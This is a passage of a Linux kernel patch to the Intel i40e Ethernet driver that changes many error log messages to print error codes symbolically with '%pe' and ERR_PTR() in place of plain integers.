+ 				     pf->hw.aq.asq_last_status));
+ 		return -ENOENT;
+@@ -6518,8 +6518,8 @@ static int i40e_validate_and_set_switch_mode(struct i40e_vsi *vsi)
+ 					mode, NULL);
+ 	if (ret && hw->aq.asq_last_status != I40E_AQ_RC_ESRCH)
+ 		dev_err(&pf->pdev->dev,
+-			"couldn't set switch config bits, err %d aq_err %s\n",
+-			ret,
++			"couldn't set switch config bits, err %pe aq_err %s\n",
++			ERR_PTR(ret),
+ 			i40e_aq_str(hw,
+ 				    hw->aq.asq_last_status));
+ 
+@@ -6719,8 +6719,8 @@ int i40e_veb_config_tc(struct i40e_veb *veb, u8 enabled_tc)
+ 						   &bw_data, NULL);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "VEB bw config failed, err %d aq_err %s\n",
+-			 ret,
++			 "VEB bw config failed, err %pe aq_err %s\n",
++			 ERR_PTR(ret),
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		goto out;
+ 	}
+@@ -6729,8 +6729,8 @@ int i40e_veb_config_tc(struct i40e_veb *veb, u8 enabled_tc)
+ 	ret = i40e_veb_get_bw_info(veb);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "Failed getting veb bw config, err %d aq_err %s\n",
+-			 ret,
++			 "Failed getting veb bw config, err %pe aq_err %s\n",
++			 ERR_PTR(ret),
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 	}
+ 
+@@ -6813,8 +6813,8 @@ static int i40e_resume_port_tx(struct i40e_pf *pf)
+ 	ret = i40e_aq_resume_port_tx(hw, NULL);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "Resume Port Tx failed, err %d aq_err %s\n",
+-			  ret,
++			 "Resume Port Tx failed, err %pe aq_err %s\n",
++			  ERR_PTR(ret),
+ 			  i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		/* Schedule PF reset to recover */
+ 		set_bit(__I40E_PF_RESET_REQUESTED, pf->state);
+@@ -6838,8 +6838,8 @@ static int i40e_suspend_port_tx(struct i40e_pf *pf)
+ 	ret = i40e_aq_suspend_port_tx(hw, pf->mac_seid, NULL);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "Suspend Port Tx failed, err %d aq_err %s\n",
+-			 ret,
++			 "Suspend Port Tx failed, err %pe aq_err %s\n",
++			 ERR_PTR(ret),
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		/* Schedule PF reset to recover */
+ 		set_bit(__I40E_PF_RESET_REQUESTED, pf->state);
+@@ -6878,8 +6878,8 @@ static int i40e_hw_set_dcb_config(struct i40e_pf *pf,
+ 	ret = i40e_set_dcb_config(&pf->hw);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "Set DCB Config failed, err %d aq_err %s\n",
+-			 ret,
++			 "Set DCB Config failed, err %pe aq_err %s\n",
++			 ERR_PTR(ret),
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		goto out;
+ 	}
+@@ -6995,8 +6995,8 @@ int i40e_hw_dcb_config(struct i40e_pf *pf, struct i40e_dcbx_config *new_cfg)
+ 		 i40e_aqc_opc_modify_switching_comp_ets, NULL);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "Modify Port ETS failed, err %d aq_err %s\n",
+-			 ret,
++			 "Modify Port ETS failed, err %pe aq_err %s\n",
++			 ERR_PTR(ret),
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		goto out;
+ 	}
+@@ -7033,8 +7033,8 @@ int i40e_hw_dcb_config(struct i40e_pf *pf, struct i40e_dcbx_config *new_cfg)
+ 	ret = i40e_aq_dcb_updated(&pf->hw, NULL);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "DCB Updated failed, err %d aq_err %s\n",
+-			 ret,
++			 "DCB Updated failed, err %pe aq_err %s\n",
++			 ERR_PTR(ret),
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		goto out;
+ 	}
+@@ -7117,8 +7117,8 @@ int i40e_dcb_sw_default_config(struct i40e_pf *pf)
+ 		 i40e_aqc_opc_enable_switching_comp_ets, NULL);
+ 	if (err) {
+ 		dev_info(&pf->pdev->dev,
+-			 "Enable Port ETS failed, err %d aq_err %s\n",
+-			 err,
++			 "Enable Port ETS failed, err %pe aq_err %s\n",
++			 ERR_PTR(err),
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		err = -ENOENT;
+ 		goto out;
+@@ -7197,8 +7197,8 @@ static int i40e_init_pf_dcb(struct i40e_pf *pf)
+ 		pf->flags |= I40E_FLAG_DISABLE_FW_LLDP;
+ 	} else {
+ 		dev_info(&pf->pdev->dev,
+-			 "Query for DCB configuration failed, err %d aq_err %s\n",
+-			 err,
++			 "Query for DCB configuration failed, err %pe aq_err %s\n",
++			 ERR_PTR(err),
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 	}
+ 
+@@ -7436,8 +7436,8 @@ static int i40e_force_link_state(struct i40e_pf *pf, bool is_up)
+ 					   NULL);
+ 	if (err) {
+ 		dev_err(&pf->pdev->dev,
+-			"failed to get phy cap., ret =  %d last_status =  %s\n",
+-			err,
++			"failed to get phy cap., ret =  %pe last_status =  %s\n",
++			ERR_PTR(err),
+ 			i40e_aq_str(hw, hw->aq.asq_last_status));
+ 		return err;
+ 	}
+@@ -7448,8 +7448,8 @@ static int i40e_force_link_state(struct i40e_pf *pf, bool is_up)
+ 					   NULL);
+ 	if (err) {
+ 		dev_err(&pf->pdev->dev,
+-			"failed to get phy cap., ret =  %d last_status =  %s\n",
+-			err,
++			"failed to get phy cap., ret =  %pe last_status =  %s\n",
++			ERR_PTR(err),
+ 			i40e_aq_str(hw, hw->aq.asq_last_status));
+ 		return err;
+ 	}
+@@ -7493,8 +7493,8 @@ static int i40e_force_link_state(struct i40e_pf *pf, bool is_up)
+ 
+ 	if (err) {
+ 		dev_err(&pf->pdev->dev,
+-			"set phy config ret =  %d last_status =  %s\n",
+-			err,
++			"set phy config ret =  %pe last_status =  %s\n",
++			ERR_PTR(err),
+ 			i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		return err;
+ 	}
+@@ -7834,8 +7834,8 @@ static int i40e_fwd_ring_up(struct i40e_vsi *vsi, struct net_device *vdev,
+ 			rx_ring->netdev = NULL;
+ 		}
+ 		dev_info(&pf->pdev->dev,
+-			 "Error adding mac filter on macvlan err %d, aq_err %s\n",
+-			  ret,
++			 "Error adding mac filter on macvlan err %pe, aq_err %s\n",
++			  ERR_PTR(ret),
+ 			  i40e_aq_str(hw, aq_err));
+ 		netdev_err(vdev, "L2fwd offload disabled to L2 filter error\n");
+ 	}
+@@ -7907,8 +7907,8 @@ static int i40e_setup_macvlans(struct i40e_vsi *vsi, u16 macvlan_cnt, u16 qcnt,
+ 	ret = i40e_aq_update_vsi_params(hw, &ctxt, NULL);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "Update vsi tc config failed, err %d aq_err %s\n",
+-			 ret,
++			 "Update vsi tc config failed, err %pe aq_err %s\n",
++			 ERR_PTR(ret),
+ 			 i40e_aq_str(hw, hw->aq.asq_last_status));
+ 		return ret;
+ 	}
+@@ -8123,8 +8123,8 @@ static void i40e_fwd_del(struct net_device *netdev, void *vdev)
+ 				ch->fwd = NULL;
+ 			} else {
+ 				dev_info(&pf->pdev->dev,
+-					 "Error deleting mac filter on macvlan err %d, aq_err %s\n",
+-					  ret,
++					 "Error deleting mac filter on macvlan err %pe, aq_err %s\n",
++					  ERR_PTR(ret),
+ 					  i40e_aq_str(hw, aq_err));
+ 			}
+ 			break;
+@@ -8875,7 +8875,8 @@ static int i40e_delete_clsflower(struct i40e_vsi *vsi,
+ 	kfree(filter);
+ 	if (err) {
+ 		dev_err(&pf->pdev->dev,
+-			"Failed to delete cloud filter, err %d\n", err);
++			"Failed to delete cloud filter, err %pe\n",
++			ERR_PTR(err));
+ 		return i40e_aq_rc_to_posix(err, pf->hw.aq.asq_last_status);
+ 	}
+ 
+@@ -9437,8 +9438,8 @@ static int i40e_handle_lldp_event(struct i40e_pf *pf,
+ 			pf->flags &= ~I40E_FLAG_DCB_CAPABLE;
+ 		} else {
+ 			dev_info(&pf->pdev->dev,
+-				 "Failed querying DCB configuration data from firmware, err %d aq_err %s\n",
+-				 ret,
++				 "Failed querying DCB configuration data from firmware, err %pe aq_err %s\n",
++				 ERR_PTR(ret),
+ 				 i40e_aq_str(&pf->hw,
+ 					     pf->hw.aq.asq_last_status));
+ 		}
+@@ -10264,8 +10265,8 @@ static void i40e_enable_pf_switch_lb(struct i40e_pf *pf)
+ 	ret = i40e_aq_get_vsi_params(&pf->hw, &ctxt, NULL);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "couldn't get PF vsi config, err %d aq_err %s\n",
+-			 ret,
++			 "couldn't get PF vsi config, err %pe aq_err %s\n",
++			 ERR_PTR(ret),
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		return;
+ 	}
+@@ -10276,8 +10277,8 @@ static void i40e_enable_pf_switch_lb(struct i40e_pf *pf)
+ 	ret = i40e_aq_update_vsi_params(&vsi->back->hw, &ctxt, NULL);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "update vsi switch failed, err %d aq_err %s\n",
+-			 ret,
++			 "update vsi switch failed, err %pe aq_err %s\n",
++			 ERR_PTR(ret),
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 	}
+ }
+@@ -10300,8 +10301,8 @@ static void i40e_disable_pf_switch_lb(struct i40e_pf *pf)
+ 	ret = i40e_aq_get_vsi_params(&pf->hw, &ctxt, NULL);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "couldn't get PF vsi config, err %d aq_err %s\n",
+-			 ret,
++			 "couldn't get PF vsi config, err %pe aq_err %s\n",
++			 ERR_PTR(ret),
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		return;
+ 	}
+@@ -10312,8 +10313,8 @@ static void i40e_disable_pf_switch_lb(struct i40e_pf *pf)
+ 	ret = i40e_aq_update_vsi_params(&vsi->back->hw, &ctxt, NULL);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "update vsi switch failed, err %d aq_err %s\n",
+-			 ret,
++			 "update vsi switch failed, err %pe aq_err %s\n",
++			 ERR_PTR(ret),
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 	}
+ }
+@@ -10457,8 +10458,8 @@ static int i40e_get_capabilities(struct i40e_pf *pf,
+ 			buf_len = data_size;
+ 		} else if (pf->hw.aq.asq_last_status != I40E_AQ_RC_OK || err) {
+ 			dev_info(&pf->pdev->dev,
+-				 "capability discovery failed, err %d aq_err %s\n",
+-				 err,
++				 "capability discovery failed, err %pe aq_err %s\n",
++				 ERR_PTR(err),
+ 				 i40e_aq_str(&pf->hw,
+ 					     pf->hw.aq.asq_last_status));
+ 			return -ENODEV;
+@@ -10595,8 +10596,8 @@ static int i40e_rebuild_cloud_filters(struct i40e_vsi *vsi, u16 seid)
+ 
+ 		if (ret) {
+ 			dev_dbg(&pf->pdev->dev,
+-				"Failed to rebuild cloud filter, err %d aq_err %s\n",
+-				ret,
++				"Failed to rebuild cloud filter, err %pe aq_err %s\n",
++				ERR_PTR(ret),
+ 				i40e_aq_str(&pf->hw,
+ 					    pf->hw.aq.asq_last_status));
+ 			return ret;
+@@ -10836,8 +10837,8 @@ static void i40e_rebuild(struct i40e_pf *pf, bool reinit, bool lock_acquired)
+ 	/* rebuild the basics for the AdminQ, HMC, and initial HW switch */
+ 	ret = i40e_init_adminq(&pf->hw);
+ 	if (ret) {
+-		dev_info(&pf->pdev->dev, "Rebuild AdminQ failed, err %d aq_err %s\n",
+-			 ret,
++		dev_info(&pf->pdev->dev, "Rebuild AdminQ failed, err %pe aq_err %s\n",
++			 ERR_PTR(ret),
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		goto clear_recovery;
+ 	}
+@@ -10948,8 +10949,8 @@ static void i40e_rebuild(struct i40e_pf *pf, bool reinit, bool lock_acquired)
+ 					 I40E_AQ_EVENT_MEDIA_NA |
+ 					 I40E_AQ_EVENT_MODULE_QUAL_FAIL), NULL);
+ 	if (ret)
+-		dev_info(&pf->pdev->dev, "set phy mask fail, err %d aq_err %s\n",
+-			 ret,
++		dev_info(&pf->pdev->dev, "set phy mask fail, err %pe aq_err %s\n",
++			 ERR_PTR(ret),
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 
+ 	/* Rebuild the VSIs and VEBs that existed before reset.
+@@ -11052,8 +11053,8 @@ static void i40e_rebuild(struct i40e_pf *pf, bool reinit, bool lock_acquired)
+ 		msleep(75);
+ 		ret = i40e_aq_set_link_restart_an(&pf->hw, true, NULL);
+ 		if (ret)
+-			dev_info(&pf->pdev->dev, "link restart failed, err %d aq_err %s\n",
+-				 ret,
++			dev_info(&pf->pdev->dev, "link restart failed, err %pe aq_err %s\n",
++				 ERR_PTR(ret),
+ 				 i40e_aq_str(&pf->hw,
+ 					     pf->hw.aq.asq_last_status));
+ 	}
+@@ -11084,9 +11085,9 @@ static void i40e_rebuild(struct i40e_pf *pf, bool reinit, bool lock_acquired)
+ 	ret = i40e_set_promiscuous(pf, pf->cur_promisc);
+ 	if (ret)
+ 		dev_warn(&pf->pdev->dev,
+-			 "Failed to restore promiscuous setting: %s, err %d aq_err %s\n",
++			 "Failed to restore promiscuous setting: %s, err %pe aq_err %s\n",
+ 			 pf->cur_promisc ? "on" : "off",
+-			 ret,
++			 ERR_PTR(ret),
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 
+ 	i40e_reset_all_vfs(pf, true);
+@@ -12220,8 +12221,8 @@ static int i40e_get_rss_aq(struct i40e_vsi *vsi, const u8 *seed,
+ 			(struct i40e_aqc_get_set_rss_key_data *)seed);
+ 		if (ret) {
+ 			dev_info(&pf->pdev->dev,
+-				 "Cannot get RSS key, err %d aq_err %s\n",
+-				 ret,
++				 "Cannot get RSS key, err %pe aq_err %s\n",
++				 ERR_PTR(ret),
+ 				 i40e_aq_str(&pf->hw,
+ 					     pf->hw.aq.asq_last_status));
+ 			return ret;
+@@ -12234,8 +12235,8 @@ static int i40e_get_rss_aq(struct i40e_vsi *vsi, const u8 *seed,
+ 		ret = i40e_aq_get_rss_lut(hw, vsi->id, pf_lut, lut, lut_size);
+ 		if (ret) {
+ 			dev_info(&pf->pdev->dev,
+-				 "Cannot get RSS lut, err %d aq_err %s\n",
+-				 ret,
++				 "Cannot get RSS lut, err %pe aq_err %s\n",
++				 ERR_PTR(ret),
+ 				 i40e_aq_str(&pf->hw,
+ 					     pf->hw.aq.asq_last_status));
+ 			return ret;
+@@ -12575,8 +12576,8 @@ int i40e_commit_partition_bw_setting(struct i40e_pf *pf)
+ 	last_aq_status = pf->hw.aq.asq_last_status;
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "Cannot acquire NVM for read access, err %d aq_err %s\n",
+-			 ret,
++			 "Cannot acquire NVM for read access, err %pe aq_err %s\n",
++			 ERR_PTR(ret),
+ 			 i40e_aq_str(&pf->hw, last_aq_status));
+ 		goto bw_commit_out;
+ 	}
+@@ -12592,8 +12593,8 @@ int i40e_commit_partition_bw_setting(struct i40e_pf *pf)
+ 	last_aq_status = pf->hw.aq.asq_last_status;
+ 	i40e_release_nvm(&pf->hw);
+ 	if (ret) {
+-		dev_info(&pf->pdev->dev, "NVM read error, err %d aq_err %s\n",
+-			 ret,
++		dev_info(&pf->pdev->dev, "NVM read error, err %pe aq_err %s\n",
++			 ERR_PTR(ret),
+ 			 i40e_aq_str(&pf->hw, last_aq_status));
+ 		goto bw_commit_out;
+ 	}
+@@ -12606,8 +12607,8 @@ int i40e_commit_partition_bw_setting(struct i40e_pf *pf)
+ 	last_aq_status = pf->hw.aq.asq_last_status;
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "Cannot acquire NVM for write access, err %d aq_err %s\n",
+-			 ret,
++			 "Cannot acquire NVM for write access, err %pe aq_err %s\n",
++			 ERR_PTR(ret),
+ 			 i40e_aq_str(&pf->hw, last_aq_status));
+ 		goto bw_commit_out;
+ 	}
+@@ -12626,8 +12627,8 @@ int i40e_commit_partition_bw_setting(struct i40e_pf *pf)
+ 	i40e_release_nvm(&pf->hw);
+ 	if (ret)
+ 		dev_info(&pf->pdev->dev,
+-			 "BW settings NOT SAVED, err %d aq_err %s\n",
+-			 ret,
++			 "BW settings NOT SAVED, err %pe aq_err %s\n",
++			 ERR_PTR(ret),
+ 			 i40e_aq_str(&pf->hw, last_aq_status));
+ bw_commit_out:
+ 
+@@ -12681,8 +12682,8 @@ static bool i40e_is_total_port_shutdown_enabled(struct i40e_pf *pf)
+ 
+ err_nvm:
+ 	dev_warn(&pf->pdev->dev,
+-		 "total-port-shutdown feature is off due to read nvm error: %d\n",
+-		 read_status);
++		 "total-port-shutdown feature is off due to read nvm error: %pe\n",
++		 ERR_PTR(read_status));
+ 	return ret;
+ }
+ 
+@@ -13009,8 +13010,8 @@ static int i40e_udp_tunnel_set_port(struct net_device *netdev,
+ 	ret = i40e_aq_add_udp_tunnel(hw, ntohs(ti->port), type, &filter_index,
+ 				     NULL);
+ 	if (ret) {
+-		netdev_info(netdev, "add UDP port failed, err %d aq_err %s\n",
+-			    ret,
++		netdev_info(netdev, "add UDP port failed, err %pe aq_err %s\n",
++			    ERR_PTR(ret),
+ 			    i40e_aq_str(hw, hw->aq.asq_last_status));
+ 		return -EIO;
+ 	}
+@@ -13029,8 +13030,8 @@ static int i40e_udp_tunnel_unset_port(struct net_device *netdev,
+ 
+ 	ret = i40e_aq_del_udp_tunnel(hw, ti->hw_priv, NULL);
+ 	if (ret) {
+-		netdev_info(netdev, "delete UDP port failed, err %d aq_err %s\n",
+-			    ret,
++		netdev_info(netdev, "delete UDP port failed, err %pe aq_err %s\n",
++			    ERR_PTR(ret),
+ 			    i40e_aq_str(hw, hw->aq.asq_last_status));
+ 		return -EIO;
+ 	}
+@@ -13919,8 +13920,8 @@ static int i40e_add_vsi(struct i40e_vsi *vsi)
+ 		ctxt.flags = I40E_AQ_VSI_TYPE_PF;
+ 		if (ret) {
+ 			dev_info(&pf->pdev->dev,
+-				 "couldn't get PF vsi config, err %d aq_err %s\n",
+-				 ret,
++				 "couldn't get PF vsi config, err %pe aq_err %s\n",
++				 ERR_PTR(ret),
+ 				 i40e_aq_str(&pf->hw,
+ 					     pf->hw.aq.asq_last_status));
+ 			return -ENOENT;
+@@ -13969,8 +13970,8 @@ static int i40e_add_vsi(struct i40e_vsi *vsi)
+ 			ret = i40e_aq_update_vsi_params(hw, &ctxt, NULL);
+ 			if (ret) {
+ 				dev_info(&pf->pdev->dev,
+-					 "update vsi failed, err %d aq_err %s\n",
+-					 ret,
++					 "update vsi failed, err %pe aq_err %s\n",
++					 ERR_PTR(ret),
+ 					 i40e_aq_str(&pf->hw,
+ 						    pf->hw.aq.asq_last_status));
+ 				ret = -ENOENT;
+@@ -13992,9 +13993,9 @@ static int i40e_add_vsi(struct i40e_vsi *vsi)
+ 				 * message and continue
+ 				 */
+ 				dev_info(&pf->pdev->dev,
+-					 "failed to configure TCs for main VSI tc_map 0x%08x, err %d aq_err %s\n",
++					 "failed to configure TCs for main VSI tc_map 0x%08x, err %pe aq_err %s\n",
+ 					 enabled_tc,
+-					 ret,
++					 ERR_PTR(ret),
+ 					 i40e_aq_str(&pf->hw,
+ 						    pf->hw.aq.asq_last_status));
+ 			}
+@@ -14088,8 +14089,8 @@ static int i40e_add_vsi(struct i40e_vsi *vsi)
+ 		ret = i40e_aq_add_vsi(hw, &ctxt, NULL);
+ 		if (ret) {
+ 			dev_info(&vsi->back->pdev->dev,
+-				 "add vsi failed, err %d aq_err %s\n",
+-				 ret,
++				 "add vsi failed, err %pe aq_err %s\n",
++				 ERR_PTR(ret),
+ 				 i40e_aq_str(&pf->hw,
+ 					     pf->hw.aq.asq_last_status));
+ 			ret = -ENOENT;
+@@ -14120,8 +14121,8 @@ static int i40e_add_vsi(struct i40e_vsi *vsi)
+ 	ret = i40e_vsi_get_bw_info(vsi);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "couldn't get vsi bw info, err %d aq_err %s\n",
+-			 ret,
++			 "couldn't get vsi bw info, err %pe aq_err %s\n",
++			 ERR_PTR(ret),
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		/* VSI is already added so not tearing that up */
+ 		ret = 0;
+@@ -14567,8 +14568,8 @@ static int i40e_veb_get_bw_info(struct i40e_veb *veb)
+ 						  &bw_data, NULL);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "query veb bw config failed, err %d aq_err %s\n",
+-			 ret,
++			 "query veb bw config failed, err %pe aq_err %s\n",
++			 ERR_PTR(ret),
+ 			 i40e_aq_str(&pf->hw, hw->aq.asq_last_status));
+ 		goto out;
+ 	}
+@@ -14577,8 +14578,8 @@ static int i40e_veb_get_bw_info(struct i40e_veb *veb)
+ 						   &ets_data, NULL);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "query veb bw ets config failed, err %d aq_err %s\n",
+-			 ret,
++			 "query veb bw ets config failed, err %pe aq_err %s\n",
++			 ERR_PTR(ret),
+ 			 i40e_aq_str(&pf->hw, hw->aq.asq_last_status));
+ 		goto out;
+ 	}
+@@ -14774,8 +14775,8 @@ static int i40e_add_veb(struct i40e_veb *veb, struct i40e_vsi *vsi)
+ 	/* get a VEB from the hardware */
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "couldn't add VEB, err %d aq_err %s\n",
+-			 ret,
++			 "couldn't add VEB, err %pe aq_err %s\n",
++			 ERR_PTR(ret),
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		return -EPERM;
+ 	}
+@@ -14785,16 +14786,16 @@ static int i40e_add_veb(struct i40e_veb *veb, struct i40e_vsi *vsi)
+ 					 &veb->stats_idx, NULL, NULL, NULL);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "couldn't get VEB statistics idx, err %d aq_err %s\n",
+-			 ret,
++			 "couldn't get VEB statistics idx, err %pe aq_err %s\n",
++			 ERR_PTR(ret),
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		return -EPERM;
+ 	}
+ 	ret = i40e_veb_get_bw_info(veb);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "couldn't get VEB bw info, err %d aq_err %s\n",
+-			 ret,
++			 "couldn't get VEB bw info, err %pe aq_err %s\n",
++			 ERR_PTR(ret),
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		i40e_aq_delete_element(&pf->hw, veb->seid, NULL);
+ 		return -ENOENT;
+@@ -15050,8 +15051,8 @@ static int i40e_setup_pf_switch(struct i40e_pf *pf, bool reinit, bool lock_acqui
+ 	ret = i40e_fetch_switch_configuration(pf, false);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "couldn't fetch switch config, err %d aq_err %s\n",
+-			 ret,
++			 "couldn't fetch switch config, err %pe aq_err %s\n",
++			 ERR_PTR(ret),
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		return ret;
+ 	}
+@@ -15077,8 +15078,8 @@ static int i40e_setup_pf_switch(struct i40e_pf *pf, bool reinit, bool lock_acqui
+ 						NULL);
+ 		if (ret && pf->hw.aq.asq_last_status != I40E_AQ_RC_ESRCH) {
+ 			dev_info(&pf->pdev->dev,
+-				 "couldn't set switch config bits, err %d aq_err %s\n",
+-				 ret,
++				 "couldn't set switch config bits, err %pe aq_err %s\n",
++				 ERR_PTR(ret),
+ 				 i40e_aq_str(&pf->hw,
+ 					     pf->hw.aq.asq_last_status));
+ 			/* not a fatal problem, just keep going */
+@@ -15984,8 +15985,8 @@ static int i40e_probe(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 					 I40E_AQ_EVENT_MEDIA_NA |
+ 					 I40E_AQ_EVENT_MODULE_QUAL_FAIL), NULL);
+ 	if (err)
+-		dev_info(&pf->pdev->dev, "set phy mask fail, err %d aq_err %s\n",
+-			 err,
++		dev_info(&pf->pdev->dev, "set phy mask fail, err %pe aq_err %s\n",
++			 ERR_PTR(err),
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 
+ 	/* Reconfigure hardware for allowing smaller MSS in the case
+@@ -16003,8 +16004,8 @@ static int i40e_probe(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 		msleep(75);
+ 		err = i40e_aq_set_link_restart_an(&pf->hw, true, NULL);
+ 		if (err)
+-			dev_info(&pf->pdev->dev, "link restart failed, err %d aq_err %s\n",
+-				 err,
++			dev_info(&pf->pdev->dev, "link restart failed, err %pe aq_err %s\n",
++				 ERR_PTR(err),
+ 				 i40e_aq_str(&pf->hw,
+ 					     pf->hw.aq.asq_last_status));
+ 	}
+@@ -16136,8 +16137,8 @@ static int i40e_probe(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 	/* get the requested speeds from the fw */
+ 	err = i40e_aq_get_phy_capabilities(hw, false, false, &abilities, NULL);
+ 	if (err)
+-		dev_dbg(&pf->pdev->dev, "get requested speeds ret =  %d last_status =  %s\n",
+-			err,
++		dev_dbg(&pf->pdev->dev, "get requested speeds ret =  %pe last_status =  %s\n",
++			ERR_PTR(err),
+ 			i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 	pf->hw.phy.link_info.requested_speeds = abilities.link_speed;
+ 
+@@ -16147,8 +16148,8 @@ static int i40e_probe(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 	/* get the supported phy types from the fw */
+ 	err = i40e_aq_get_phy_capabilities(hw, false, true, &abilities, NULL);
+ 	if (err)
+-		dev_dbg(&pf->pdev->dev, "get supported phy types ret =  %d last_status =  %s\n",
+-			err,
++		dev_dbg(&pf->pdev->dev, "get supported phy types ret =  %pe last_status =  %s\n",
++			ERR_PTR(err),
+ 			i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 
+ 	/* make sure the MFS hasn't been set lower than the default */
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_nvm.c b/drivers/net/ethernet/intel/i40e/i40e_nvm.c
+index 779ba907009a5..f99c1f7fec406 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_nvm.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_nvm.c
+@@ -1429,8 +1429,8 @@ static int i40e_nvmupd_exec_aq(struct i40e_hw *hw,
+ 				       buff_size, &cmd_details);
+ 	if (status) {
+ 		i40e_debug(hw, I40E_DEBUG_NVM,
+-			   "%s err %d aq_err %s\n",
+-			   __func__, status,
++			   "%s err %pe aq_err %s\n",
++			   __func__, ERR_PTR(status),
+ 			   i40e_aq_str(hw, hw->aq.asq_last_status));
+ 		*perrno = i40e_aq_rc_to_posix(status, hw->aq.asq_last_status);
+ 		return status;
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_virtchnl_pf.c b/drivers/net/ethernet/intel/i40e/i40e_virtchnl_pf.c
+index 547e67d9470b7..cb925baf72ce0 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_virtchnl_pf.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_virtchnl_pf.c
+@@ -1264,9 +1264,9 @@ i40e_set_vsi_promisc(struct i40e_vf *vf, u16 seid, bool multi_enable,
+ 			int aq_err = pf->hw.aq.asq_last_status;
+ 
+ 			dev_err(&pf->pdev->dev,
+-				"VF %d failed to set multicast promiscuous mode err %d aq_err %s\n",
++				"VF %d failed to set multicast promiscuous mode err %pe aq_err %s\n",
+ 				vf->vf_id,
+-				aq_ret,
++				ERR_PTR(aq_ret),
+ 				i40e_aq_str(&pf->hw, aq_err));
+ 
+ 			return aq_ret;
+@@ -1280,9 +1280,9 @@ i40e_set_vsi_promisc(struct i40e_vf *vf, u16 seid, bool multi_enable,
+ 			int aq_err = pf->hw.aq.asq_last_status;
+ 
+ 			dev_err(&pf->pdev->dev,
+-				"VF %d failed to set unicast promiscuous mode err %d aq_err %s\n",
++				"VF %d failed to set unicast promiscuous mode err %pe aq_err %s\n",
+ 				vf->vf_id,
+-				aq_ret,
++				ERR_PTR(aq_ret),
+ 				i40e_aq_str(&pf->hw, aq_err));
+ 		}
+ 
+@@ -1297,9 +1297,9 @@ i40e_set_vsi_promisc(struct i40e_vf *vf, u16 seid, bool multi_enable,
+ 			int aq_err = pf->hw.aq.asq_last_status;
+ 
+ 			dev_err(&pf->pdev->dev,
+-				"VF %d failed to set multicast promiscuous mode err %d aq_err %s\n",
++				"VF %d failed to set multicast promiscuous mode err %pe aq_err %s\n",
+ 				vf->vf_id,
+-				aq_ret,
++				ERR_PTR(aq_ret),
+ 				i40e_aq_str(&pf->hw, aq_err));
+ 
+ 			if (!aq_tmp)
+@@ -1313,9 +1313,9 @@ i40e_set_vsi_promisc(struct i40e_vf *vf, u16 seid, bool multi_enable,
+ 			int aq_err = pf->hw.aq.asq_last_status;
+ 
+ 			dev_err(&pf->pdev->dev,
+-				"VF %d failed to set unicast promiscuous mode err %d aq_err %s\n",
++				"VF %d failed to set unicast promiscuous mode err %pe aq_err %s\n",
+ 				vf->vf_id,
+-				aq_ret,
